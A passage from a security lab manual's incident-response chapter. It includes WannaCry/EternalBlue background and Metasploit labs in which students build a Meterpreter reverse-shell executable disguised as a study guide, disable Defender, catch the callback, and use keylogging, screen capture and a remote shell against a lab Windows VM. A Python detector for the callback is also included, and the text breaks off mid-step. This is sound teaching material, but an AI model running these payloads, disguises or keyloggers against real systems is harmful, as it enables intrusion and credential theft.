Chapter 22

Incident Response

Lab Exercises

22.01   Incident Response Companies and Stories

22.02   Metasploit Framework

22.03   Metasploit’s Meterpreter

22.04   Armitage

Lab Analysis

Key Term Quiz

The National Institute of Standards and Technology’s (NIST) Computer Security Resource Center (CSRC) provides the following as one of the definitions of incident (https://csrc.nist.gov/glossary/term/incident):

An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Furthermore, incident response is defined by the NIST CSRC as “the mitigation of violations of security policies and recommended practices” (https://csrc.nist.gov/glossary/term/incident_response).

Incident response comprises the steps an organization takes right after a cyberattack or data breach to contain the damage and preserve evidence for forensic analysis as far as possible. If not done correctly, the restoration and recovery of a system or network can cause even more damage. Therefore, having a dedicated computer incident response team (CIRT), if possible, is highly advisable.

60 MINUTES

Lab Exercise 22.01: Incident Response Companies and Stories

The more proactive a company is about incident response, the more successful it will be. Anticipate not if, but when, you will be attacked, and the odds are better that you'll be able to contain the damage. Knowing about recent incidents and how other companies responded to them is crucial as well.

Learning Objectives

In this lab exercise, you’ll explore the services and resources provided by multiple companies. At the end of this lab exercise, you’ll be able to

•   Understand how incident response is properly done

•   Be up to date on recent incident response stories

Lab Materials and Setup

The materials you need for this lab are

•   The Principles of Computer Security: CompTIA Security+ and Beyond textbook

•   A web browser with an Internet connection

Let’s Do This!

Fire up a browser. You’re about to research incident response services from various companies.


Step 1 Lots of companies offer incident response services. Evaluate the following companies and write a report comparing the services offered:

•   Check Point

•   Cisco

•   Cylance

•   FireEye

•   IBM

•   McAfee

•   RSA

•   Secureworks

•   Symantec

•   Trustwave

When performing a Google search for these companies, enter the name of the company along with the phrase “incident response” in quotation marks.

In your report, address each of the following questions and anything else you feel is important:

•   What is offered by all companies?

•   What is unique to each?

•   What is the best part of each company’s service?

•   What is one thing that can be improved in each company’s service?

•   Which is the best overall package and why?


Step 2 SecurityIntelligence, by IBM Security, posts articles on “developing and testing an incident response plan, ransomware and other evolving threats and how regulations affect incident response.”

Pick five of the recent articles at https://securityintelligence.com/category/incident-response/ and write a paragraph summary for each.

60 MINUTES

Lab Exercise 22.02: Metasploit Framework

Seeing what an active incident looks like is a great way to understand how incident response works and what containing an incident involves. As you perform the steps in this lab exercise, imagine that you are not only the one carrying out the attack on offense but also the person responsible for detecting and containing it on defense.

The word exploit is both a noun and a verb. The noun exploit means a small and focused program, set of data, or a sequence of commands that takes advantage of a vulnerability, causing unintended and unanticipated behavior. The verb exploit means to do it. You use an exploit (pronounced with emphasis on the first syllable, EXploit) to exploit (pronounced with emphasis on the second syllable, exPLOIT) a vulnerability.

A vulnerability is a weakness, a flaw, a gap, or a hole in an operating system, software, or hardware that provides a way into a system or network for the attackers. A weak password, susceptibility to buffer overflows, and susceptibility to SQL injection attacks (covered in Chapter 19) are all examples of vulnerabilities.

How do these vulnerabilities come to light? Who discovers them? From the black hat camp, malicious attackers do. From the white hat camp, security researchers do. Both sides spend day in and day out poking and prodding operating systems, software, and hardware. Black hat hackers, if caught, go to prison. White hat hackers, who do the same things but with explicit permission from the system/network owners, get paid, have thrilling careers, and are held in high regard in the cybersecurity community. White hat hackers, also known as pentesters, penetration testers, and ethical hackers, are hired by companies to find and exploit vulnerabilities so that those vulnerabilities can be fixed before black hat hackers discover them.

Cross Reference

The Introduction of this book discusses the origin and evolution of the term hacker, as well as another type of hacker: gray hat hackers.

Some vulnerabilities are labeled zero-day. These are vulnerabilities that are exploited, or become public, before the vendor knows about them, so the companies and individuals who would normally patch them have had zero days to fix the problem or suggest mitigation techniques. Zero-day exploits (also known as zero-day attacks) aren't used against a large number of targets, because widespread use triggers discovery, detection signatures (in anti-malware programs and IDS/IPS devices), and vendor patches. A zero-day won't stay a zero-day if used too often! Therefore, attackers stockpile them and save them for specific high-value situations. Governments stockpile them, too, instead of notifying the vendors whose devices and software protect their own citizens. Such a stockpile is very valuable for reconnaissance and cyberattacks against adversary nation-states and cybercriminals. However, bad things can happen as a result.

Such was the case for the WannaCry ransomware outbreak on Friday, May 12, 2017, which propagated with the EternalBlue exploit for the Microsoft Windows Server Message Block (SMB) protocol. EternalBlue had been a zero-day for the years it was held privately; by the time of the outbreak it had been patched for two months, but unpatched machines were everywhere. EternalBlue was part of a set of tools developed by the Advanced Persistent Threat (APT) known as the Equation Group, which is believed to be tied to the National Security Agency (NSA) hacking unit known as Tailored Access Operations (TAO). Essentially, the NSA created, used, and refined the EternalBlue exploit for at least five years, from 2011 through 2016. Three former NSA operators claimed that analysts spent nearly a year finding the flaw in Microsoft's software and writing the code to exploit it. The NSA did not alert Microsoft about the vulnerability but instead used it for offensive attacks, intelligence gathering, and counterterrorism missions.

SMB is a network file sharing protocol that allows applications on a computer to read and write to files and to request services. It also allows for network browsing and network printing. The vulnerability can be exploited because the SMB Version 1 (SMBv1) server, in some versions of Microsoft Windows, mishandles specially crafted packets from remote attackers, which allows them to execute arbitrary code on a target computer.

In August 2016, a hacking group calling itself the Shadow Brokers announced that it had stolen malware code from the Equation Group. In January 2017, when the NSA discovered that the EternalBlue exploit had been stolen and was about to leak into the public domain, they finally notified Microsoft. In February 2017, Microsoft delayed its regular release of security patches because they were hard at work writing fixes for EternalBlue. In March 2017, Microsoft put out security bulletin MS17-010, with patches for all supported versions of Windows operating systems at the time. These patches killed off the SMB vulnerability, rendering EternalBlue dead on systems that were patched. In April 2017, the Shadow Brokers dumped an NSA toolkit of cyberweapons, including EternalBlue, giving anyone access to these exploit tools. The problem, of course, was that many individuals and companies ignored the Microsoft patches in March, and on May 12, 2017, found their systems locked and encrypted with a ransom demand.

Around 200,000 computers were infected in 150 countries. The biggest impacts were felt in Russia, Ukraine, India, and Taiwan. Major telecommunications companies in Spain were affected. Many National Health Service (NHS) hospitals in England and Scotland told noncritical accident and emergency patients to stay away, as over 70,000 devices were locked and encrypted, including computers, MRI scanners, and blood storage refrigerators. Critical patients had to be moved to other facilities. Companies everywhere told their employees to shut down and unplug their machines. The ransomware locked the machines, encrypted files, and demanded $300 in Bitcoin for a decryption key, doubling to $600 after three days. At the time, nearly 90 percent of NHS trusts still had Windows XP, an almost 16-year-old operating system, somewhere on their networks. Overall, the Windows XP market share was around 7 percent in May 2017, a huge installed base considering that Microsoft had stopped supporting Windows XP in April 2014.

Within 24 hours of the WannaCry outbreak, Microsoft took the unusual and unprecedented step of issuing emergency patches for unsupported operating systems, including Windows XP, Windows Server 2003, and Windows 8, to stop the ransomware's spread. Then in June 2017, Microsoft issued more patches for the unsupported OSes to close vulnerabilities that could be attacked with the Shadow Brokers exploits, as well as older issues, a few going back as far as nine years, that could still be exploited.

Not long after the WannaCry outbreak began, a 22-year-old web security researcher from England, who goes by the handle MalwareTech, found the kill switch in the ransomware. Reverse engineering WannaCry, he saw that before doing anything else it checked whether a gibberish-looking domain name hard-coded in the binary led to a live web page, and exited if it did. Out of curiosity, he registered that domain himself for $10.69. Once the malware found the domain live, it shut down without encrypting anything. This largely halted the initial outbreak, although new variants without the kill switch were detected soon afterward. It took about a day before MalwareTech was doxed by U.K. tabloids and identified, against his will, as Marcus Hutchins.

Note

The WannaCry hero, Marcus Hutchins, was in the news again when he was arrested on August 2, 2017, and charged with creating and selling malware that stole online banking credentials. The remarkable story behind that, and what came before and after, is detailed at www.wired.com/story/confessions-marcus-hutchins-hacker-who-saved-the-internet.

Researchers also found ways to recover data from WannaCry-infected machines under certain circumstances (for example, by pulling the RSA key material out of the memory of machines that had not been rebooted). In a surprising twist, antivirus vendor Kaspersky Lab concluded that 98 percent of the victims were actually running Windows 7 and that the number of infected Windows XP machines was insignificant. The lesson is the same, though: upgrade and patch. Incredibly, EternalBlue was used again on June 27, 2017, as part of the NotPetya cyberattack, which also targeted unpatched systems.

A 1-day (a delay of one day since disclosure) or N-day (a delay of some number of days since disclosure) vulnerability is, in aggregate, often more damaging than a zero-day, because the exploit is public and the pool of unpatched targets is large. Responsible (or coordinated) disclosure is a model in which an ethical hacker gives the vendor a set number of days to patch a vulnerability before reporting it publicly. Simply sitting on these vulnerabilities would be security through obscurity (a black hat hacker would likely uncover them at some point anyway), so ethical hackers feel a social responsibility to disclose. For example, Google's Project Zero gives vendors 90 days after notification before public disclosure, or discloses as soon as a patch is released if that happens sooner. The Common Vulnerabilities and Exposures (CVE) system assigns a single identifier to each publicly known vulnerability (the SMBv1 flaw EternalBlue exploits is CVE-2017-0144), which allows easy sharing of information across different databases and tools and gives an organization a baseline for measuring the coverage of its tools.

When a vulnerability is publicly disclosed without a patch in place, a race begins between attackers (who didn't know about the vulnerability until then) writing exploits and the vendor putting out a security patch. Exploitation increases once the vulnerability is disclosed and then decreases over time as a patch is released and installed by more and more individuals and organizations. In the meantime, the likelihood of an unpatched system being exploited rises from possible to probable, and for high-value targets from probable to near-certain. According to the article at https://securityboulevard.com/2020/06/why-it-takes-10x-longer-to-patch-than-it-does-to-exploit/, it takes ten times longer to patch than it does to exploit.

Even if the vulnerability is disclosed with a patch already available, there will still be many targets for attackers to exploit. Not all individuals and companies are diligent in applying updates and patches (as the WannaCry story proved). If the vendor knew about the vulnerability before disclosure, the patch may already have been pushed out silently through automatic updates; otherwise it is released explicitly and requires manual installation. Furthermore, it's a best practice for organizations to test patches before deploying them, since blindly deploying patches can break things in an enterprise environment. Patch testing causes a delay, of course, and in that window a vulnerability can easily be exploited. Studies have shown that the exploits with the most success are older ones against vulnerabilities that still haven't been patched.

Even scarier, according to a 2020 study (https://unit42.paloaltonetworks.com/state-of-exploit-development/), an exploit for a vulnerability is published on average 37 days after the patch is released, and the risk of exploitation rises quickly once a patch is out. The patch itself tells attackers that a vulnerability exists, and its description may be enough to write an exploit that anyone can then use against targets. For patches that disclose minimal information (possibly to thwart exploit development), attackers can diff the patched and unpatched versions of the code, reverse engineer the change, design an exploit based on the patch itself, and exploit systems that haven't had the patch applied.

Finally, there are proof-of-concept (PoC) exploits, often developed by white hat hackers and vendors themselves to show how a vulnerability can be exploited and to develop a patch. Generally, these are not meant to cause damage, but they can be turned around, refined, and used by black hat hackers, especially for unpatched vulnerabilities.

Exploits usually deliver a payload to a system under attack, to allow the attacker to penetrate the system. Payload is the actual code that allows attackers to control systems after they’ve been exploited.

Imagine two burglars driving in a van. The driver rams the van into a storefront. The other guy jumps out and starts looting the store. The van would be the exploit, and the burglar filling his bags would be the payload.

Think of a missile—the rocket, fuel, and everything else in the rocket is the exploit. The warhead is what does the actual damage—that’s the payload. Take out the warhead, and the missile doesn’t have a strong impact. Furthermore, a warhead without being delivered by a rocket won’t do much either.

Penetration testing, or simply pentesting, is very similar to a cyberattack by a black hat hacker. First, you find systems (as shown in this chapter). Next, you find programs or services on those systems (as shown in Chapter 16, through port scanning). Then, you find vulnerabilities in those programs or services on those systems (as shown in Chapter 25). Then, you find ways that those vulnerabilities can be exploited (as shown in this chapter). Finally, you go ahead and actually exploit those vulnerabilities (as shown in this chapter). Now that you’ve compromised systems, you can use them to pivot to other systems on the same network as well as systems on different networks.

Learning Objectives

In this lab exercise, you’ll attack a Windows 10 system. At the end of this lab exercise, you’ll be able to

•   Use Metasploit to exploit a vulnerability to gain control of a Windows 10 system

•   Understand what an active incident looks like to gain a better idea of what might be needed to contain it

Lab Materials and Setup

The materials you need for this lab are

•   The Principles of Computer Security: CompTIA Security+ and Beyond textbook

•   The Windows 10 VM you created in Chapter 1

•   The Kali Linux VM you created in Chapter 1

Let’s Do This!

Real-time protection must be turned off on the Windows 10 VM for this lab exercise to work correctly.

Turn off Real-time Protection on the Windows 10 VM by following these steps:

1.   Click the Start button (or click in the search box) and enter Security.

2.   Click Windows Security.

3.   Click Virus & Threat Protection.

4.   Click Manage Settings under Virus & Threat Protection Settings.

5.   Under Real-time Protection, click the button to turn it off.

6.   Click the Yes button in the popup asking if you want to allow this app to make changes to your device.

7.   Click the X in the upper-right corner of the window to close it.

In this lab exercise, you will use these tools that come with Kali Linux:

•   Metasploit Framework Contains a large public database and framework of over 2,000 quality-assured exploits and close to 600 payloads, which certainly explains its name. Metasploit also contains nearly 50 encoders, which are used to transform the payload to fool anti-malware software, firewalls, intrusion detection systems (IDSs) and intrusion prevention systems (IPSs), as well as remove bad characters that would crash a target program or system.

•   MSFvenom Combines payload generation and encoding.

•   MSFconsole The most popular interface to the Metasploit Framework. MSFconsole is an all-in-one centralized console to work from.

•   PostgreSQL (pronounced post-gres-Q-L) An open-source relational database management system (RDBMS) used by Metasploit.

•   Meterpreter Metasploit’s most popular payload. Meterpreter allows you to do many things on the victim machine, including uploading, downloading, creating, modifying, and deleting files, taking screenshots, watching the victim machine live, taking over the screen, mouse, and keyboard, turning on a webcam, and much more.

In the following steps, be sure to press ENTER after each command.


Step 1 Open a terminal in your Kali Linux VM. Create an executable file with a Meterpreter payload, start a web server, and copy the executable file to the root directory of the web server.

a.   First, use MSFvenom to generate a 64-bit Windows executable file that implements a reverse TCP shell, Meterpreter, for the payload.

You’ll recall from Chapter 16 that a bind shell listens on the victim’s machine and waits for the attacker to connect in, allowing the attacker to execute commands on the victim’s machine. Firewalls and Network Address Translation (NAT) get in the way of inbound connections, so pentesters and attackers often use a reverse shell instead, which goes in the other direction: a connection initiated from the victim’s machine on the inside out to the attacker’s machine on the outside. This also comes in handy when an attacker strategically “drops” a USB drive in a company’s parking lot and waits for an employee to plug it in. The attacker doesn’t know how the network is set up, but whatever runs from that USB drive will create a reverse shell back to the attacker’s machine regardless of the victim’s IP address, NAT, or inbound firewall rules. The defender’s counter is egress filtering: a reverse shell still needs the victim’s network to allow the outbound connection to the attacker’s chosen port (here, 14618).

Enter the IP address of your Kali Linux VM in place of the IP address listed for LHOST (this is one single command; do not press ENTER after the first line):

sudo msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows
-f exe LHOST=192.168.1.114 LPORT=14618 -o ~/Desktop/WeissmanStudyGuide.exe

Put in your password when prompted now and when prompted throughout the chapter.

To understand this command, enter

msfvenom -h

for the help screen.

The -p option specifies the payload. The -a option specifies the architecture of the victim machine. The --platform option specifies the platform of the payload. LHOST specifies the IP address of local host (the attacking system). LPORT specifies the local port listening for the incoming connection from the victim machine. The -o option specifies the path and name of the output file.

The output will look like this (your path will be different per your user account):

No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /home/jonathan/Desktop/WeissmanStudyGuide.exe

b.   Start the Apache web server, officially known as the Apache HTTP Server, which comes with Kali Linux. Then verify that it’s started. Toward the top of the output, you should see “Active: active (running)” if Apache started successfully (note that the “2” after the name in the commands represents version 2 of the server). Press q to quit the status screen.

sudo service apache2 start
sudo service apache2 status

c.   From the (soon-to-be) victim Windows 10 system, open up a browser, enter in the IP address of your Kali Linux VM in the address bar, and press ENTER. You should see the “Apache2 Debian Default Page” now that the web server has been started.

d.   Back in the Kali Linux VM, enter

sudo cp ~/Desktop/WeissmanStudyGuide.exe /var/www/html

to copy the malicious WeissmanStudyGuide.exe file from the Desktop directory, where the file was created in Step 1a to the root directory of the web server.


Step 2 Start the database server, create and initialize the Metasploit Framework database, start Metasploit, and launch MSFconsole.

a.   In the Kali Linux VM, open up a terminal and start the PostgreSQL database server:

sudo /etc/init.d/postgresql start

b.   Create and initialize the Metasploit Framework database with the following command:

sudo msfdb init

You might see information messages that the database is already started and appears to be already configured. You might also see a message about Python backward compatibility.

You’ll only enter this command the first time you go through these steps. Subsequently, use

sudo msfdb start

to start Metasploit.

You might see an information message that the database is already started.

c.   Launch MSFconsole:

sudo msfconsole

After a moment, you’ll see the msf prompt. You will see different welcome text in MSFconsole each time you open it, with great puns and text graphics, as shown in Figure 22-1.


FIGURE 22-1 Welcome to Metasploit!

You might see a message about deprecated pg constants.

All commands will now be entered in the MSFconsole environment, as you are no longer in the Linux shell (Zsh on current Kali releases, Bash on older ones). Notice the prompt has the letters msf, followed by the version number, followed by the > symbol. Figure 22-1 was made when Kali Linux 2020.2 and msf5 were current.


Step 3 Explore Metasploit exploits.

a.   Enter the following to see all the exploits associated with Server Message Block (SMB), a protocol used for sharing files, printers, serial ports, and communications abstractions. There have been many attacks against SMB over the years—most notably, the May 2017 WannaCry ransomware attack, which used the EternalBlue exploit.

search smb

b.   Enter the following to see the different versions of the EternalBlue exploit and related exploits:

search eternalblue

c.   Enter the following to see more information on the EternalBlue exploit:

info exploit/windows/smb/ms17_010_eternalblue

d.   One of the most famous exploits against SMB is ms08_067_netapi. Take a look at information related to that notorious exploit by entering the following two commands into Metasploit (press ENTER after each command):

search ms08_067_netapi
info exploit/windows/smb/ms08_067_netapi

The naming convention for these modules is “ms” for Microsoft, followed by the two-digit year of the Microsoft security bulletin that fixed the vulnerability (2017 and 2008, respectively, for the exploits in this step), followed by that bulletin’s number within the year (010 and 067, so MS17-010 and MS08-067), followed by a short descriptive name. Note that the year is when Microsoft issued the fix, not when the exploit was discovered.

Now take a look at another oldie but goodie by entering the following two commands:

search exploit/windows/dcerpc/ms03_026_dcom
info exploit/windows/dcerpc/ms03_026_dcom


Step 4 Configure an exploit and payload and then launch the exploit. This exercise was written when MSFconsole was in version 6; your prompt may have a different number after msf throughout this exercise.

a.   At the msf6 > prompt, enter

use multi/handler

which instructs Metasploit to use this generic payload handler exploit module. This allows the running of a stand-alone payload, which is simply a payload without an exploit. The stand-alone payload you created earlier with MSFvenom was the reverse TCP shell, Meterpreter, and this multi/handler module will catch the shell.

b.   At the msf6 exploit(multi/handler) > prompt, enter

set payload windows/x64/meterpreter/reverse_tcp

You’ll receive the following output confirmation:

payload => windows/x64/meterpreter/reverse_tcp

This gets the ball rolling in using the reverse TCP shell stand-alone payload, Meterpreter, created earlier with MSFvenom.

c.   At the msf6 exploit(multi/handler) > prompt, enter

set LHOST <IP Address of Kali Linux VM>

For example, enter

set LHOST 192.168.1.114

where the IP address represents the IP address of your Kali Linux VM.

You’ll receive the following output confirmation:

LHOST => 192.168.1.114

This specifies your IP address as the local host for this exploit module, matching the IP address configured for the payload with MSFvenom.

d.   At the msf6 exploit(multi/handler) > prompt, enter

set LPORT 14618

to set the local port that will listen for incoming traffic from the victim machine. Use my choice of 14618. This specifies 14618 as the local port for this exploit module, matching the port configured for the payload with MSFvenom.

You’ll receive the following output confirmation:

LPORT => 14618

e.   At the msf6 exploit(multi/handler) > prompt, enter

show options

to see information about the payload and exploit.

f.   At the msf6 exploit(multi/handler) > prompt, enter

exploit

to start the magic!

You’ll see output similar to the following (with your IP address instead):

[*] Started reverse TCP handler on 192.168.1.114:14618


Step 5 Simulate a victim falling for a phishing attack by downloading and running a malicious file, which will launch the exploit you created earlier.

a.   Let’s imagine you receive an e-mail stating that Professor Weissman’s Study Guide offers you a 100 percent guarantee of passing the CompTIA Security+ certification. Wait, it gets even better. All you have to do is click a link and get it for free!

Open up Firefox on the victim machine (Chrome will block the file you’re going to download now and not even give you an opportunity to override its decision). In the address bar, enter http://<IP address of your Kali Linux VM>/WeissmanStudyGuide.exe and press ENTER.

For example, enter the following:
http://192.168.1.114/WeissmanStudyGuide.exe

Be sure to use uppercase and lowercase letters for the file, as shown.

In the dialog box that follows, click the Save File button.

b.   In the Downloads folder, double-click WeissmanStudyGuide.exe to launch it.

c.   You’ll see the Windows Protected Your PC window, which states, “Microsoft Defender SmartScreen prevented an unrecognized app from starting. Running this app might put your PC at risk.”

Users have likely seen this message many times for legitimate programs and have become desensitized to it, so clicking through it without a second thought is the norm.

Don’t click the Don’t Run button at the bottom right; instead, click the More Info hyperlink at the top.

You’ll see the following:

App: WeissmanStudyGuide.exe

Publisher: Unknown publisher

Click the Run Anyway button at the bottom.

d.   In the Kali Linux VM, you’ll notice under the msf6 exploit(multi/handler) > exploit prompt (with your IP addresses) that you are in business, as shown here:

[*] Started reverse TCP handler on 192.168.1.114:14618
[*] Sending stage (201283 bytes) to 192.168.1.121
[*] Meterpreter session 1 opened (192.168.1.114:14618 -> 192.168.1.121:49884)
at 2020-08-14 15:56:49 -0400

meterpreter >

The next lab exercise picks up at this exact point. If you are not continuing at this time, you’ll have to reestablish the Meterpreter shell before starting the next lab exercise. Therefore, it’s highly recommended that you continue with the next lab exercise now.
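Step 5d is what the attacker sees. The defender’s side of the same moment, as an added example that is not part of this lab or of Metasploit, is the correlation a detection engineer would write from endpoint telemetry: a process launched from a user-writable folder such as Downloads that opens an outbound connection to an uncommon port within minutes of starting. The events below are constructed, simplified Sysmon-style records (process-create and network-connect) mirroring the Windows 10 VM in this step; the PIDs, paths, and timestamps are hypothetical, and the Firefox and installer records are there to show what should not alert.

```python
"""Defender's view of Step 5: spot a reverse-shell callback in endpoint telemetry.

Added example for this lab exercise, not code from the book or from Metasploit.
Events are constructed, simplified Sysmon-style records (Event ID 1 = process
create, Event ID 3 = network connect) mirroring what the Windows 10 VM would
generate: WeissmanStudyGuide.exe launched from Downloads, then its callback to
the Kali handler on port 14618. PIDs, paths, and timestamps are hypothetical.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

SAMPLE_EVENTS: List[Dict] = [
    # Browser started earlier in the session (benign).
    {"id": 1, "time": "2020-08-14T15:50:05", "pid": 5120,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    # An installer run from Downloads that only talks HTTPS (benign).
    {"id": 1, "time": "2020-08-14T15:55:10", "pid": 6004,
     "image": r"C:\Users\student\Downloads\vlc-setup.exe"},
    {"id": 3, "time": "2020-08-14T15:55:30", "pid": 6004,
     "dst": "203.0.113.10", "dport": 443},
    # Firefox fetching WeissmanStudyGuide.exe from the Kali web server (Step 5a).
    {"id": 3, "time": "2020-08-14T15:56:20", "pid": 5120,
     "dst": "192.168.1.114", "dport": 80},
    # The malicious executable runs (Step 5b/5c) and calls back (Step 5d).
    {"id": 1, "time": "2020-08-14T15:56:40", "pid": 4812,
     "image": r"C:\Users\student\Downloads\WeissmanStudyGuide.exe"},
    {"id": 3, "time": "2020-08-14T15:56:49", "pid": 4812,
     "dst": "192.168.1.114", "dport": 14618},
]

# Folders an ordinary user can write to. A binary running from one of these is
# weak evidence on its own (installers live there too), so it is paired with
# the port check below.
USER_WRITABLE = ("\\downloads\\", "\\desktop\\", "\\appdata\\local\\temp\\")
# Destination ports on which outbound connections from a workstation are expected.
EXPECTED_PORTS = {22, 25, 53, 80, 443, 587, 993, 995}
# A connection opened this soon after process start is the signature of a
# dropper phoning home rather than a long-running application.
LAUNCH_WINDOW = timedelta(minutes=5)


@dataclass
class Alert:
    pid: int
    image: str
    dst: str
    dport: int
    reasons: Tuple[str, ...]


def launched_from_user_dir(image: str) -> bool:
    return any(seg in image.lower() for seg in USER_WRITABLE)


def find_callbacks(events: List[Dict]) -> List[Alert]:
    """Correlate each network connect with the process-create event for its PID
    and alert only when the process runs from a user folder AND uses an
    unexpected port. Either signal alone stays quiet."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    alerts: List[Alert] = []
    for ev in events:
        if ev["id"] != 3 or ev["pid"] not in procs:
            continue
        proc = procs[ev["pid"]]
        odd_path = launched_from_user_dir(proc["image"])
        odd_port = ev["dport"] not in EXPECTED_PORTS
        if not (odd_path and odd_port):
            continue
        reasons = ["image runs from a user-writable directory",
                   f"outbound connection to uncommon port {ev['dport']}"]
        age = datetime.fromisoformat(ev["time"]) - datetime.fromisoformat(proc["time"])
        if timedelta(0) <= age <= LAUNCH_WINDOW:
            reasons.append(f"connection opened {int(age.total_seconds())}s after process start")
        alerts.append(Alert(ev["pid"], proc["image"], ev["dst"], ev["dport"], tuple(reasons)))
    return alerts


def containment_steps(alert: Alert) -> List[str]:
    """First actions for the responder, ordered so that containment does not
    destroy evidence: isolate, capture, terminate, then block."""
    return [
        "isolate the host from the network but leave it powered on",
        "capture volatile state (memory image, open connections, process list) before any reboot",
        f"terminate PID {alert.pid} and preserve {alert.image} for analysis",
        f"block egress to {alert.dst}:{alert.dport} and hunt other hosts for the same destination",
    ]


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_EVENTS):
        print(f"ALERT pid={alert.pid} {alert.image} -> {alert.dst}:{alert.dport}")
        for reason in alert.reasons:
            print("  why:", reason)
        for step in containment_steps(alert):
            print("  do: ", step)
```

Run it as a script to see the single alert and the suggested order of actions. The point is that Firefox fetching the file over port 80 and an installer calling home over 443 stay quiet, while the Meterpreter callback to 14618 from Downloads trips both conditions. Isolation comes before termination because disconnecting the network preserves the process’s memory and the evidence of the live session, whereas killing the process first destroys it.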

60 MINUTES

Lab Exercise 22.03: Metasploit’s Meterpreter

Time to use a stealthy, powerful, and extensible payload, Meterpreter, described in the “Let’s Do This” section of the previous lab exercise and at https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/.

Learning Objectives

In this lab exercise, you’ll continue where you left off in the previous lab exercise and use Metasploit’s Meterpreter payload. At the end of this lab exercise, you’ll be able to

•   Perform an attack on a Windows 10 system

•   Understand how parts of the attack relate to incident response

Lab Materials and Setup

The materials you need for this lab are

•   The Principles of Computer Security: CompTIA Security+ and Beyond textbook

•   The Windows 10 VM you created in Chapter 1

•   The Kali Linux VM you created in Chapter 1

•   The previous lab exercise completed with machines in the state they were at the end of the exercise

Let’s Do This!

If you are not continuing this lab exercise right after the previous one, power on the Windows 10 VM and the Kali Linux VM.

If your Kali Linux VM is using a different IP address now, you must generate a new payload with MSFvenom, copy it to the root directory of the web server, and download it from the Windows 10 VM. You might as well just go through the entire previous lab exercise again and then continue here.

If your Kali Linux VM is using the same IP address as before, there is no need to generate a new payload with MSFvenom, nor is there a need to redownload the WeissmanStudyGuide.exe file (unless it was deleted) from the Windows 10 VM.

On the Kali Linux VM, restart the Apache web server, launch MSFconsole, and enter the following commands from the previous lab exercise to get back to a Meterpreter shell:

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <IP address of your Kali Linux VM>
set LPORT 14618
exploit

From the Windows 10 VM, make sure that Real-time Protection is off (it turns itself back on, so if it did, turn it off again) and then double-click the WeissmanStudyGuide.exe file to launch it. You should once again see a Meterpreter shell in the Kali Linux VM.

Now it’s time to see what Meterpreter is all about.

Images 1a–1g

Step 1 Explore Meterpreter commands for gaining insight and performing actions on the victim machine.

a.   Start by getting information on the compromised system and its drives:

sysinfo

b.   To see the amount of time that has elapsed since someone used the keyboard of the compromised system (letting you know if someone might respond to this incident right away), enter

idletime

c.   To see a list of every running process on the compromised system, enter

ps

d.   Open up Notepad on the Windows 10 VM. From Meterpreter, enter

ps | notepad

to see information about the process.

Then enter

pkill notepad

…and, poof, it’s gone!

Imagine if the user of the victim machine were watching their screen at the time a program was closed like this. That user would be able to detect and respond to this incident. Also imagine if the program being closed were something far more significant than Notepad.

e.   To see a list of all Meterpreter commands, enter

help

f.   Let’s pick one that sounds very tantalizing:

screenshot

You’ll notice a message such as the following:

Screenshot saved to: /home/jonathan/owTKbzwo.jpeg

Click the Kali Linux icon in the upper-left corner of the window. In the pane on the right, select File Manager. The window should automatically open to your home directory. Find the image with the matching name seen in Meterpreter and double-click the image to open it up. You’ll see the desktop of the victim machine when you snapped the screenshot.

g.   Now only one thing can really top that, right? This time enter

screenshare

You might see a message stating “Running Firefox as root in a regular user’s session is not supported.” If so, go back to the File Manager window you opened from the previous step and double-click a file with a globe icon, a randomly constructed filename, and an .html extension.

Now you’ll be able to watch the victim machine in real time.

Perform some activities in the Windows 10 VM and watch those actions mirrored in the window for the Metasploit screenshare.

Close the tab when you’re done and press CTRL-C in the Meterpreter CLI window to return to the Meterpreter shell.

Images 2a–2g

Step 2 Capture keystrokes from the victim machine through Meterpreter.

a.   It would be helpful for an attacker to capture keystrokes on a victim machine, which could include username/password combinations and the websites those credentials are used on. Keystroke logging could also capture sensitive information typed into a document or e-mail, even if at the last minute the file or e-mail is discarded and not saved or sent. Other URLs and names of programs or files can also be captured and used nefariously.

In the Meterpreter shell, enter

keyscan_start

to start the keystroke sniffer.

b.   On the Windows 10 VM, open up Notepad and start typing a couple of paragraphs of anything. Be sure to use the arrow keys, BACKSPACE, and DELETE.

c.   On the Windows 10 VM, open up any browser and go to www.chase.com.

Note

Throughout this step, you will not be able to sign in with any of the username/password combinations. They are provided to illustrate the keystroke-logging process.

Enter a username of bob and a password of bobpassword in the corresponding textboxes and click the blue Sign In button.

d.   Go to https://mycourses.rit.edu.

Click the RIT Account Login button, enter a username of bob2 and a password of bobpassword2, and click the Log In button.

e.   Go to https://lms.flcc.edu.

Click the OK button on the Privacy, Cookies And Terms Of Use popup, enter a username of bob3 and a password of bobpassword3 in the corresponding textboxes, and click the Login button.

f.   Go to https://mail.google.com.

Enter an e-mail address of [email protected] or anything else that gets recognized by Gmail, click the Next button, and then enter a 20-character password using multiple character sets. Click the Next button.

g.   Click the Start button or click in the search box, type Paint, and click Paint.

h.   Back in Meterpreter on the Kali Linux VM, enter

keyscan_dump

This will dump every keystroke since you initiated the keyscan_start command to the screen.

Imagine if the user of the victim machine typed an angry letter, only to reconsider and delete it. You’d have it! You might have parts of a document that were subsequently deleted or changed. You’d also have any password that was entered (and protected with TLS in transit) regardless of length and complexity, and regardless of the strong hash format it might be stored with on the authenticating system.

i.   Enter

keyscan_stop

to stop scanning keystrokes.

Images 3a–3f

Step 3 Explore the Meterpreter networking-related commands that can get information and send traffic from the victim machine.

a.   Take a look at the Meterpreter help again, and you’ll notice a section full of networking commands. Try these commands:

arp
ifconfig
ipconfig
netstat
route

You’ll notice the outputs for ifconfig and ipconfig are the same, and that the outputs look different than when those tables are viewed from a Windows command prompt. However, getting to a Windows command prompt from Meterpreter is simple.

b.   From Meterpreter, open a command prompt from the compromised machine with the following command:

shell

c.   Now you can execute networking commands as if you were physically in front of the compromised machine.

See the machine’s ARP cache with

arp -a

d.   See the machine’s network configuration with

ipconfig /all

e.   See the machine’s DNS resolver cache with

